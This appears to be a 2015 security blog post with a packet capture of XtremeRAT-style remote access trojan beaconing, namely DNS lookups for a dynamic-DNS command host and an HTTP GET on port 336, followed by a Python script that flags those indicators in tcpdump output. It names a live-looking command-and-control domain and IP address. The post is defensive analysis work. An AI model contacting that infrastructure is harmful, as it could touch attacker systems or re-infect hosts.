APT Like – XTremeRAT – Remote Access Trojan – Port 336 Traffic GET /1234567890.functions

By | June 18, 2015

2013-02-03 19:10:21.612693 IP 172.16.253.131.53 > 8.8.8.8.53: 47611+ A? shittway.zapto.org. (36)
E..@……………..5.5.,……………shittway.zapto.org…..
2013-02-03 19:10:21.612755 IP 172.16.253.131.53 > 4.2.2.2.53: 47611+ A? shittway.zapto.org. (36)
E..@……………..5.5.,……………shittway.zapto.org…..
2013-02-03 19:10:21.708585 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [S], seq 2370154844, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…S,……8F…P.E.\….p……………
2013-02-03 19:10:22.114884 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 1045510444, win 64240, length 0
E..(. @…S2……8F…P.E.]>Q9,P…Q…
2013-02-03 19:10:22.115180 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [P.], seq 0:323, ack 1, win 64240, length 323
E..k.!@…Q…….8F…P.E.]>Q9,P…*_..GET /1234567890.functions HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: shittway.zapto[.]org:336
Connection: Keep-Alive
Cache-Control: no-cache

2013-02-03 19:10:22.731970 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 2457, win 64240, length 0
E..(.%@…S-……8F…P.E..>QB.P…G…
2013-02-03 19:10:23.217068 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 4913, win 64240, length 0
E..(.(@…S*……8F…P.E..>QL\P…=l..
2013-02-03 19:10:23.302765 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 7369, win 64240, length 0
E..(.+@…S'……8F…P.E..>QU.P…3…
2013-02-03 19:10:23.662890 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 9825, win 64240, length 0
E..(..@…S$……8F…P.E..>Q_.P…*<..
2013-02-03 19:10:23.746115 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 12281, win 64240, length 0
E..(.1@…S!……8F…P.E..>Qi$P… …
2013-02-03 19:10:23.828537 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 14737, win 64240, length 0
E..(.4@…S…….8F…P.E..>Qr.P…….
2013-02-03 19:10:23.912906 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 17193, win 64240, length 0
E..(.7@…S…….8F…P.E..>Q|TP….t..
2013-02-03 19:10:24.141726 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 19649, win 64240, length 0
E..(.:@…S…….8F…P.E..>Q..P…….
2013-02-03 19:10:24.226939 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 22105, win 64240, length 0
E..(.=@…S…….8F…P.E..>Q..P….C..
2013-02-03 19:10:24.308474 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 24561, win 64240, length 0
E..(.@@…S…….8F…P.E..>Q..P…….
2013-02-03 19:10:24.393512 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 27017, win 64240, length 0
E..(.C@…S…….8F…P.E..>Q..P…….
2013-02-03 19:10:24.474892 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 29473, win 64240, length 0
E..(.F@…S…….8F…P.E..>Q.LP….{..
2013-02-03 19:10:24.557932 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 31929, win 64240, length 0
E..(.I@…S ……8F…P.E..>Q..P…….
2013-02-03 19:10:24.641400 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 34385, win 64240, length 0
E..(.L@…S…….8F…P.E..>Q.|P….K..
2013-02-03 19:10:24.725255 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 36841, win 64240, length 0
E..(.O@…S…….8F…P.E..>Q..P…….
2013-02-03 19:10:24.808259 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 39297, win 64240, length 0
E..(.R@…S…….8F…P.E..>Q..P…….
2013-02-03 19:10:24.891069 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 41753, win 64240, length 0
E..(.U@…R…….8F…P.E..>Q.DP…….
2013-02-03 19:10:24.975803 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 44209, win 64240, length 0
E..(.X@…R…….8F…P.E..>Q..P…….
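What the capture above actually gives a defender is a small set of checkable indicators rather than one signature: the A lookups for the zapto.org dynamic-DNS name leave the host from source port 53 with the same transaction ID (47611) fired at two public resolvers at once, the client then speaks plain HTTP to TCP/336, the request line is GET /1234567890.functions with a canned IE8-on-XP User-Agent and a Host header that repeats the odd port, and the server streams back roughly 44 KB (the acks climb to 44209) while the client sends nothing further. The script below is an added example, not part of the original post or of any XtremeRAT tooling: it parses tcpdump text output in the layout shown above and reports each of those indicators. The sample lines are constructed from the capture (User-Agent shortened), the "common HTTP port" set and the 10,000-byte response threshold are assumptions to tune for your network, and the hostnames and addresses in the benign sample are made up for the test.

```python
"""Added example (not from the original post): flag the beacon pattern in the
capture above from tcpdump one-line summaries plus the printed HTTP request."""
import re
from collections import defaultdict

# Constructed sample, trimmed from the capture above (User-Agent shortened).
SAMPLE = """\
2013-02-03 19:10:21.612693 IP 172.16.253.131.53 > 8.8.8.8.53: 47611+ A? shittway.zapto.org. (36)
2013-02-03 19:10:21.612755 IP 172.16.253.131.53 > 4.2.2.2.53: 47611+ A? shittway.zapto.org. (36)
2013-02-03 19:10:21.708585 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [S], seq 2370154844, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2013-02-03 19:10:22.114884 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 1045510444, win 64240, length 0
2013-02-03 19:10:22.115180 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [P.], seq 0:323, ack 1, win 64240, length 323
GET /1234567890.functions HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: shittway.zapto.org:336
Connection: Keep-Alive
2013-02-03 19:10:24.975803 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 44209, win 64240, length 0
"""

# Constructed benign traffic for comparison: ephemeral DNS source port, port 80, plain Host.
BENIGN = """\
2013-02-03 19:10:21.612693 IP 172.16.253.131.49152 > 8.8.8.8.53: 12345+ A? example.com. (29)
2013-02-03 19:10:22.115180 IP 172.16.253.131.49153 > 93.184.216.34.80: Flags [P.], seq 0:100, ack 1, win 64240, length 100
GET /index.html HTTP/1.1
Host: example.com
2013-02-03 19:10:22.200000 IP 172.16.253.131.49153 > 93.184.216.34.80: Flags [.], ack 1257, win 64240, length 0
"""

# tcpdump summary: "<date> <time> IP a.b.c.d.PORT > e.f.g.h.PORT: <rest>"
SUMMARY_RE = re.compile(
    r'^\S+ \S+ IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): (.*)$')
DNS_QUERY_RE = re.compile(r'^(\d+)\+ A\? (\S+)\. \(\d+\)$')     # "47611+ A? host. (36)"
REQUEST_RE = re.compile(r'^(GET|POST|HEAD) (\S+) HTTP/1\.[01]$')
HOST_RE = re.compile(r'^Host: ([^:\s]+)(?::(\d+))?$')
ACK_RE = re.compile(r'\back (\d+)\b')
FUNCTIONS_URI_RE = re.compile(r'^/\d+\.functions$')           # shape seen in the capture
COMMON_HTTP_PORTS = {80, 443, 8000, 8080, 8443, 8888}         # assumption: tune per network
LARGE_RESPONSE_BYTES = 10_000                                 # assumption: tasking-sized reply

def analyze(text):
    """Return a list of (indicator, detail) tuples found in tcpdump text output."""
    findings = []
    txid_resolvers = defaultdict(set)   # (txid, qname) -> resolvers the same query went to
    requests = []                       # HTTP requests, attributed to the last flow printed
    flows_with_request = set()
    bytes_from_server = {}              # flow -> highest relative ack after the request
    flow = None

    for line in text.splitlines():
        m = SUMMARY_RE.match(line)
        if m:
            src, sport, dst, dport, rest = (m.group(1), int(m.group(2)), m.group(3),
                                            int(m.group(4)), m.group(5))
            flow = (src, sport, dst, dport)
            q = DNS_QUERY_RE.match(rest)
            if q:
                txid, qname = int(q.group(1)), q.group(2)
                txid_resolvers[(txid, qname)].add(dst)
                if sport == 53:
                    # A stub resolver uses an ephemeral port; source port 53 on the
                    # client side means something is building its own DNS packets.
                    findings.append(('dns_client_source_port_53', f'{src} -> {dst} {qname}'))
                continue
            a = ACK_RE.search(rest)
            if a and flow in flows_with_request:
                # After the handshake tcpdump prints relative numbers, so ack N means
                # N-1 bytes have come back from the server on this connection.
                bytes_from_server[flow] = max(bytes_from_server.get(flow, 0), int(a.group(1)) - 1)
            continue
        r = REQUEST_RE.match(line)
        if r and flow is not None:
            requests.append({'flow': flow, 'method': r.group(1), 'uri': r.group(2),
                             'host': None, 'host_port': None})
            flows_with_request.add(flow)
            continue
        h = HOST_RE.match(line)
        if h and requests:
            requests[-1]['host'] = h.group(1)
            requests[-1]['host_port'] = int(h.group(2)) if h.group(2) else None

    for (txid, qname), resolvers in txid_resolvers.items():
        if len(resolvers) > 1:
            findings.append(('dns_txid_reused_across_resolvers',
                             f'{qname} txid {txid} -> {sorted(resolvers)}'))
    for req in requests:
        src, sport, dst, dport = req['flow']
        where = f"{dst}:{dport} {req['method']} {req['uri']}"
        if dport not in COMMON_HTTP_PORTS:
            findings.append(('http_on_nonstandard_port', where))
        if FUNCTIONS_URI_RE.match(req['uri']):
            findings.append(('xtremerat_like_functions_uri', where))
        if req['host_port'] == dport and dport not in COMMON_HTTP_PORTS:
            findings.append(('host_header_carries_nonstandard_port',
                             f"Host: {req['host']}:{req['host_port']}"))
        got = bytes_from_server.get(req['flow'], 0)
        if got >= LARGE_RESPONSE_BYTES:
            findings.append(('large_response_to_small_beacon', f'{got} bytes back on {where}'))
    return findings

def indicators(text):
    """Sorted, de-duplicated indicator names for a capture."""
    return sorted({tag for tag, _ in analyze(text)})

if __name__ == '__main__':
    for tag, detail in analyze(SAMPLE):
        print(f'{tag:40} {detail}')
```

Run it over real output from `tcpdump -nn -tttt -A -r capture.pcap` (the flags that produce the layout shown above); with `-S` tcpdump prints absolute sequence numbers and the byte estimate becomes meaningless, so keep that flag off. None of the indicators is conclusive alone (a proxy on 8080 or a CDN that streams a large first response will trip one of them), but the DNS source-port and duplicate-transaction-ID behaviour together with HTTP on an unregistered port and a Host header that repeats it is a combination a normal Windows client never produces.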
